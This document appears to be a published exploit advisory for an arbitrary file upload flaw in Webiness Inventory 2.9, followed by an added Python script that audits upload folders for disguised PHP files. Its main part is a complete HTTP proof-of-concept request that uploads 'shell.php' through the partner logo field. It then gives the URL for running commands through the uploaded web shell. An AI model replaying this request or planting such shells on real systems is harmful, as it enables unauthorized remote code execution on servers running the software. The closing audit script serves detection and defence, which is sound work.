Exploit Title: Webiness Inventory 2.9 Arbitrary File Upload
Exploit Author: The Mechiavellian
Exploit Author Facebook: fb.me/The-Machiavellian-215753465894214/
Vendor Homepage / Software Link: https://github.com/webiness/webiness_inventory
Version: 2.9
Tested on: XAMPP win7_X64
Credit to: Boumediene Kaddour
> Vulnerable Code:
https://github.com/webiness/webiness_inventory/blob/master/protected/library/ajax/WsSaveToModel.php
> Proof of Concept:
POST /webiness_inventory-2.3/protected/library/ajax/WsSaveToModel.php HTTP/1.1
Content-Length: 1838
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Win7_x64)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUOOyIF2f26nDrsM7
Referer: http://172.16.122.4/webiness_inventory-2.3/index.php?request=partners/index/
Accept-Encoding: gzip
Accept-Language: en-US,en
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="model_name"
PartnerModel
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="partner_name"
My crucial Partner
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="logo"; filename="shell.php"
Content-Type: application/octet-stream
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="id_number"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="tax_number"
225588664477
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="iban"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="address1"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="address2"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="region_state"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="country"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="email"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="phone_number"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="web"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name=""
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name=""
------WebKitFormBoundaryUOOyIF2f26nDrsM7--
Access your shell at:
http://172.16.122.4/webiness_inventory-2.3/runtime/PartnerModel/YourShell.php?cmd=whoami
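As an added defender-side example (not part of the original advisory or the Webiness project), the audit below walks the runtime/<Model>/ upload directory and flags stored "logo" files that are not genuine images: wrong extension, missing PNG/JPEG/GIF signature, or a PHP open tag in the content. The directory layout under a temporary root and the sample file names are constructed assumptions.

```python
"""Audit an upload directory such as runtime/PartnerModel/ for files that
are not real images (the 'logo' field should only ever hold images)."""
import re
import tempfile
from pathlib import Path

# Magic-byte prefixes of the image formats a partner logo could legitimately be.
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif87a": b"GIF87a",
    "gif89a": b"GIF89a",
}
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def classify_upload(path: Path) -> list:
    """Return the reasons a stored upload looks wrong; an empty list means it passes."""
    reasons = []
    if path.suffix.lower() not in ALLOWED_EXT:
        reasons.append(f"extension {path.suffix!r} not in allow-list")
    with path.open("rb") as fh:
        head = fh.read(8192)
    if not any(head.startswith(m) for m in IMAGE_MAGIC.values()):
        reasons.append("content does not start with a PNG/JPEG/GIF signature")
    if PHP_TAG.search(head):
        reasons.append("PHP open tag found inside file")
    return reasons


def audit_upload_dir(upload_dir: Path) -> dict:
    """Walk runtime/<Model>/ and map each suspicious file to its findings."""
    findings = {}
    for p in sorted(upload_dir.rglob("*")):
        if p.is_file():
            reasons = classify_upload(p)
            if reasons:
                findings[str(p.relative_to(upload_dir))] = reasons
    return findings


def demo() -> dict:
    """Constructed sample directory: one genuine PNG logo, one .php upload, and
    one file with an image extension but PHP content (hypothetical names)."""
    root = Path(tempfile.mkdtemp()) / "runtime" / "PartnerModel"
    root.mkdir(parents=True)
    (root / "logo.png").write_bytes(IMAGE_MAGIC["png"] + b"\x00" * 32)
    (root / "shell.php").write_bytes(b"<?php /* constructed placeholder */ ?>")
    (root / "logo2.jpg").write_bytes(b"<?php /* constructed placeholder */ ?>")
    return audit_upload_dir(root)
```

Run `audit_upload_dir(Path("runtime"))` from the application root to check every model's upload folder at once; any hit should be treated as an incident indicator, not merely cleaned up.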